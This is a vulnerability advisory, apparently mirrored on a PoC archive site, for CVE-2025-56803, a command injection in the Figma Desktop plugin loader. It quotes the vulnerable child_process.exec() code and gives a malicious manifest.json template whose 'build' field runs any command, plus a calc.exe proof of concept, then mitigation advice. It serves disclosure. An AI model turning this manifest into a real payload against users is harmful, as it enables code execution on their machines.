关联漏洞
描述
Command Injection Vulnerability via Plugin Execution in Figma Desktop Application
介绍
# CVE-2025-56803
### Command Injection Vulnerability via Plugin Execution in Figma Desktop Application
## 1. Overview
<img src="images/figma_icon.png" alt="Figma Icon" align="left" width="60" hspace="10"/>
<br clear="left"/>
- **Application**: Figma Desktop Application
- **Version**: 125.6.5
- **Vendor**: Figma, Inc.
- **CWE**: [CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')](https://cwe.mitre.org/data/definitions/78.html)
-
## 2. Summary
Figma Desktop Application(v125.6.5) contains a command injection vulnerability in plugin loader.
A malicious plugin manifest(`manifest.json`) can abuse the `build` field, which is passed directly into `child_process.exec()` without validation.
This allows arbitrary OS command execution as soon as the plugin is loaded, without security warnings or prompts.
## 3. Details
The vulnerability stems from code located in `main.js`, which imports Node.js’s built-in `child_process` module:
```javascript
Zlt = require("child_process")
```
Later, if the `build` field is present in a plugin’s `manifest.json` file and its value is a string, application executes the value directly using `child_process.exec()` without any sanitization or validation:
```javascript
if (
s.build &&
typeof s.build === "string" &&
(l.path = process.env.PATH || "",
await new Promise((g) => {
(0, Zlt.exec)(s.build, { cwd: i }, (y, I, P) => {
l.stdout = I;
l.stderr = P;
y && (l.buildErrCode = y.code);
g();
});
}),
l.buildErrCode
)
return l;
```
As a result, the following `manifest.json` file contained in a malicious plugin would cause the value of the build field to be executed as an OS command:
```json
{
"name": "<NAME>",
"id": "<ID>",
"api": "1.0.0",
"main": "code.js",
"build": "<COMMAND>",
"capabilities": [],
"enableProposedApi": false,
"documentAccess": "dynamic-page",
"editorType": [
"figma"
],
"networkAccess": {
"allowedDomains": [
"none"
]
}
}
```
This execution flow is embedded in Figma’s plugin handling logic, and the inclusion of the `require("child_process")` call in `main.js` confirms that command execution is built directly into the application’s core logic.
## 4. Proof of Concept (PoC)
By running a plugin that includes the following malicious `manifest.json`:
```json
{
"name": "poc",
"id": "1535549154235958412",
"api": "1.0.0",
"main": "code.js",
"build": "calc.exe",
"capabilities": [],
"enableProposedApi": false,
"documentAccess": "dynamic-page",
"editorType": [
"figma"
],
"networkAccess": {
"allowedDomains": [
"none"
]
}
}
```
Once this plugin is registered in Figma and executed, the specified OS command(`calc.exe`) runs immediately.
https://github.com/user-attachments/assets/48e0a47a-0d1c-4a92-b9ff-33e9559fd5e7
## 5. Recommendations
Although the execution of the `build` field is an officially supported feature in the Figma Desktop Application, the application should avoid relying on user-controlled fields in `manifest.json`, such as `build`, wherever possible.
If such fields must be supported, they must undergo strict input validation to prevent command injection.
Additionally, the use of Node.js `child_process.exec()` should be avoided, and safer alternatives with explicit argument handling should be adopted instead.
## 6. References
- https://www.cve.org/CVERecord?id=CVE-2025-56803
- https://www.figma.com/plugin-docs/manifest/
文件快照
[4.0K] /data/pocs/a12c1d2328cc57aa3a60a9e0d45c7bdb6151dd93
├── [4.0K] images
│ ├── [ 69K] figma_icon.png
│ └── [298K] figma-poc.mp4
├── [4.0K] poc-plugin
│ ├── [ 118] code.js
│ ├── [ 900] code.ts
│ ├── [ 304] manifest.json
│ ├── [1.1K] package.json
│ ├── [ 1] README.md
│ └── [ 178] tsconfig.json
└── [3.4K] README.md
2 directories, 9 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。